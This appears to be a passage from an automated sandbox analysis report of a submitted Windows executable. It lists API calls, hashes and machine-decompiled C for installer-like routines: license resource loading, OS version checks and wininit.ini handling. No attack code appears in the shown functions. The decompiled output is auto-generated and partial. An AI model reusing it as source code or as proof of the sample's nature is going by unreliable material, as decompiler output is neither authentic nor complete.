                                                                                                                                                                                                      0x00a66876
                                                                                                                                                                                                      0x00a6693a
                                                                                                                                                                                                      0x00a6693a
                                                                                                                                                                                                      0x00a6687c
                                                                                                                                                                                                      0x00a6687e
                                                                                                                                                                                                      0x00a66885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a668d6
                                                                                                                                                                                                      0x00a668f4
                                                                                                                                                                                                      0x00a66900
                                                                                                                                                                                                      0x00a66902
                                                                                                                                                                                                      0x00a6690a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6690c
                                                                                                                                                                                                      0x00a6690c
                                                                                                                                                                                                      0x00a6691c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6691e
                                                                                                                                                                                                      0x00a66924
                                                                                                                                                                                                      0x00a6692b
                                                                                                                                                                                                      0x00a66932
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6692b
                                                                                                                                                                                                      0x00a6691c
                                                                                                                                                                                                      0x00a6690a
                                                                                                                                                                                                      0x00a66885
                                                                                                                                                                                                      0x00a66876
                                                                                                                                                                                                      0x00a66951

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A6686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00A668A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A668CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,?,0000000C), ref: 00A668F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A66902
                                                                                                                                                                                                        • Part of subcall function 00A666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A6691A), ref: 00A66741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 00A668C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                                                                                                      • Opcode ID: dac36b2270b76da918e012b1414684dcc687cc1ac5e5a433880d123cef3feda1
                                                                                                                                                                                                      • Instruction ID: 9cfefe347f1c9d5fb0217a232115c4f145c3f989b8d444353b1a4eb4236248ca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dac36b2270b76da918e012b1414684dcc687cc1ac5e5a433880d123cef3feda1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7316132A402189FDF31CB51DC45BAAB778FB55768F0402A5ED49B6240DB709E86CF92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A63A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E00A6468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0xa68d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E00A6468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0xa68d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0xa68d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E00A66517(_t19, 0x7d1, 0, E00A63100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0xa68d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa69124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0xa68d4c);
                                                                                                                                                                                                      					 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xa69124 = E00A66285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x00a63a46
                                                                                                                                                                                                      0x00a63a57
                                                                                                                                                                                                      0x00a63a5d
                                                                                                                                                                                                      0x00a63a63
                                                                                                                                                                                                      0x00a63a6a
                                                                                                                                                                                                      0x00a63a91
                                                                                                                                                                                                      0x00a63a9a
                                                                                                                                                                                                      0x00a63ad8
                                                                                                                                                                                                      0x00a63b13
                                                                                                                                                                                                      0x00a63b19
                                                                                                                                                                                                      0x00a63b1b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63b21
                                                                                                                                                                                                      0x00a63ae7
                                                                                                                                                                                                      0x00a63af4
                                                                                                                                                                                                      0x00a63afc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63afe
                                                                                                                                                                                                      0x00a63a87
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63a87
                                                                                                                                                                                                      0x00a63aa8
                                                                                                                                                                                                      0x00a63ab3
                                                                                                                                                                                                      0x00a63ab9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63ab9
                                                                                                                                                                                                      0x00a63a78
                                                                                                                                                                                                      0x00a63a82
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A62F64,?,00000002,00000000), ref: 00A63A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A63AB3
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A63AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 00A63B13
                                                                                                                                                                                                        • Part of subcall function 00A66517: FindResourceA.KERNEL32(00A60000,000007D6,00000005), ref: 00A6652A
                                                                                                                                                                                                        • Part of subcall function 00A66517: LoadResource.KERNEL32(00A60000,00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A66538
                                                                                                                                                                                                        • Part of subcall function 00A66517: DialogBoxIndirectParamA.USER32(00A60000,00000000,00000547,00A619E0,00000000), ref: 00A66557
                                                                                                                                                                                                        • Part of subcall function 00A66517: FreeResource.KERNEL32(00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A66560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00A63100,00000000,00000000), ref: 00A63AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: 8825c619f87114bdf014cce950713601b5e16be755e9b67f73c56cbabe4b5011
                                                                                                                                                                                                      • Instruction ID: 150e8a886c5dbfed70de38c804a50f4e5fcc0414c7e9c6a873a39b075a1174a9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8825c619f87114bdf014cce950713601b5e16be755e9b67f73c56cbabe4b5011
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6117871200101ABD760DBB29D09E1779BDDBE5740B10452DF545E61E1DFFA88029664
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A624E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E00A6658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00a624e0
                                                                                                                                                                                                      0x00a624eb
                                                                                                                                                                                                      0x00a624f2
                                                                                                                                                                                                      0x00a624f7
                                                                                                                                                                                                      0x00a62504
                                                                                                                                                                                                      0x00a6250e
                                                                                                                                                                                                      0x00a6251d
                                                                                                                                                                                                      0x00a6252c
                                                                                                                                                                                                      0x00a62541
                                                                                                                                                                                                      0x00a62546
                                                                                                                                                                                                      0x00a62553
                                                                                                                                                                                                      0x00a62555
                                                                                                                                                                                                      0x00a62555
                                                                                                                                                                                                      0x00a62546
                                                                                                                                                                                                      0x00a6256c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A62506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A6252C
                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 00A6253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A6254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 00A62555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: eb54c284f7eea86269f4d15603ac1b6680f25772f8532d675a54ae8ed124518e
                                                                                                                                                                                                      • Instruction ID: fffe82c9faf7b918268a78be51f58f235f45f80892fea449a6ddee78f5696afa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb54c284f7eea86269f4d15603ac1b6680f25772f8532d675a54ae8ed124518e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201B1326001286BC720EBA59D0DEDFBB7CEB95760F010165FA59E3190DEB48E46CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00A636EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0xa68184 = 1;
                                                                                                                                                                                                      						 *0xa68180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0xa69a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0xa68a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E00A62A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E00A62A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xa68a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0xa68a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E00A6681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E00A667C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E00A628E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0xa69a40 = _t119;
                                                                                                                                                                                                      						 *0xa68184 = 1;
                                                                                                                                                                                                      						 *0xa68180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0xa69a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xa68184 = _t135;
                                                                                                                                                                                                      							 *0xa68180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
